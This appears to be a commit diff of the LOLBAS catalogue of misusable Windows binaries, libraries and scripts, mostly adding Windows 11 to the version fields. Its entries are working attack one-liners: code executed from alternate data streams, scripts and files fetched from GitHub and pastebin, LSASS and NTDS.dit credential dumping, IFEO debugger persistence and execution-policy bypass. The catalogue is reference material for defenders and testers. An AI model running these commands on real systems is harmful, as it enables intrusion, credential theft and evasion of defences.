OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions)
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Full_Path:
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe

2
yml/OSBinaries/Runonce.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe

4
yml/OSBinaries/Sc.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe

4
yml/OSBinaries/Schtasks.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
Privileges: Administrator
MitreID: T1053.005
OperatingSystem: Windows
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe

4
yml/OSBinaries/Scriptrunner.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe

2
yml/OSBinaries/SettingSyncHost.yml
View File

@ -2,7 +2,7 @@
Name: SettingSyncHost.exe
Description: Host Process for Setting Synchronization
Author: 'Elliot Killick'
Created: '2021-08-26'
Created: 2021-08-26
Commands:
- Command: SettingSyncHost -LoadAndRunDiagScript anything
Description: Execute file specified in %COMSPEC%

4
yml/OSBinaries/Stordiag.yml
View File

@ -2,7 +2,7 @@
Name: Stordiag.exe
Description: Storage diagnostic tool
Author: 'Eral4m'
Created: '2021-10-21'
Created: 2021-10-21
Commands:
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe

4
yml/OSBinaries/Ttdinject.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 2004
OperatingSystem: Windows 10 2004 and above, Windows 11
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1909
OperatingSystem: Windows 10 1909 and below
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe

4
yml/OSBinaries/Tttracer.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1809 and newer
OperatingSystem: Windows 10 1809 and newer, Windows 11
- Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID
Category: Dump
Privileges: Administrator
MitreID: T1003
OperatingSystem: Windows 10 1809 and newer
OperatingSystem: Windows 10 1809 and newer, Windows 11
Full_Path:
- Path: C:\Windows\System32\tttracer.exe
- Path: C:\Windows\SysWOW64\tttracer.exe

10
yml/OSBinaries/Vbc.yml
View File

@ -5,19 +5,19 @@ Author: Lior Adar
Created: 2020-02-27
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command
Usecase: A description of the usecase
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe

2
yml/OSBinaries/Verclsid.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.012
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe

2
yml/OSBinaries/Wab.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe

31
yml/OSBinaries/Wmic.yml
View File

@ -10,56 +10,35 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
Usecase: Execute binary with scheduled task created with wmic on a remote computer
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\wbem\wmic.exe
- Path: C:\Windows\SysWOW64\wbem\wmic.exe

4
yml/OSBinaries/WorkFolders.yml
View File

@ -2,7 +2,7 @@
Name: WorkFolders.exe
Description: Work Folders
Author: 'Elliot Killick'
Created: '2021-08-16'
Created: 2021-08-16
Commands:
- Command: WorkFolders
Description: Execute control.exe in the current working directory
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe
Detection:

6
yml/OSBinaries/Wscript.yml
View File

@ -4,20 +4,20 @@ Description: Used by Windows to execute scripts
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: wscript c:\ads\file.txt:script.vbs
- Command: wscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Description: Download and execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe

2
yml/OSBinaries/Wsreset.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: UAC Bypass
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\wsreset.exe
Code_Sample:

8
yml/OSBinaries/Xwizard.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe

10
yml/OSLibraries/Advpack.yml
View File

@ -10,35 +10,35 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\advpack.dll
- Path: c:\windows\syswow64\advpack.dll

2
yml/OSLibraries/Dfshim.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

10
yml/OSLibraries/Ieadvpack.yml
View File

@ -10,35 +10,35 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ieadvpack.dll
- Path: c:\windows\syswow64\ieadvpack.dll

4
yml/OSLibraries/Ieframe.yml
View File

@ -2,7 +2,7 @@
Name: Ieframe.dll
Description: Internet Browser DLL for translating HTML code.
Author: LOLBAS Team
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll

4
yml/OSLibraries/Mshtml.yml
View File

@ -5,12 +5,12 @@ Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)."
Usecase: Launch an HTA application.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\mshtml.dll
- Path: c:\windows\syswow64\mshtml.dll

2
yml/OSLibraries/Pcwutl.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\pcwutl.dll
- Path: c:\windows\syswow64\pcwutl.dll

6
yml/OSLibraries/Setupapi.yml
View File

@ -2,7 +2,7 @@
Name: Setupapi.dll
Description: Windows Setup Application Programming Interface
Author: LOLBAS Team
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
@ -10,8 +10,8 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload.
Category: Execute

6
yml/OSLibraries/Shdocvw.yml
View File

@ -5,12 +5,12 @@ Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll

8
yml/OSLibraries/Shell32.yml
View File

@ -4,27 +4,27 @@ Description: Windows Shell Common Dll
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
Description: Launch a DLL payload by calling the Control_RunDLL function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Description: Launch an executable by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Description: Launch command line by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\shell32.dll
- Path: c:\windows\syswow64\shell32.dll

4
yml/OSLibraries/Syssetup.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll

12
yml/OSLibraries/Url.yml
View File

@ -10,42 +10,42 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Launch an executable by calling FileProtocolHandler.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling FileProtocolHandler.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Description: Launch a HTML application payload by calling FileProtocolHandler.
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\url.dll
- Path: c:\windows\syswow64\url.dll

4
yml/OSLibraries/Zipfldr.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable payload by calling RouteTheCall (obfuscated).
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll

4
yml/OSLibraries/comsvcs.yml
View File

@ -4,13 +4,13 @@ Description: COM+ Services
Author: LOLBAS Team
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\comsvcs.dll
Code_Sample:

4
yml/OSScripts/CL_LoadAssembly.yml
View File

@ -4,13 +4,13 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well)
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:

2
yml/OSScripts/CL_mutexverifiers.yml
View File

@ -4,7 +4,7 @@ Description: Proxy execution with CL_Mutexverifiers.ps1
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1
- Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1
Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
Usecase: Proxy execution
Category: Execute

2
yml/OSScripts/Cl_invocation.yml
View File

@ -4,7 +4,7 @@ Description: Aero diagnostics script
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args]
- Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke <executable> [args]
Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
Usecase: Proxy execution
Category: Execute

4
yml/OSScripts/Manage-bde.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
Usecase: Proxy execution from script
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\manage-bde.wsf
Code_Sample:

2
yml/OSScripts/Syncappvpublishingserver.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Code_Sample:

4
yml/OSScripts/UtilityFunctions.yml
View File

@ -4,13 +4,13 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
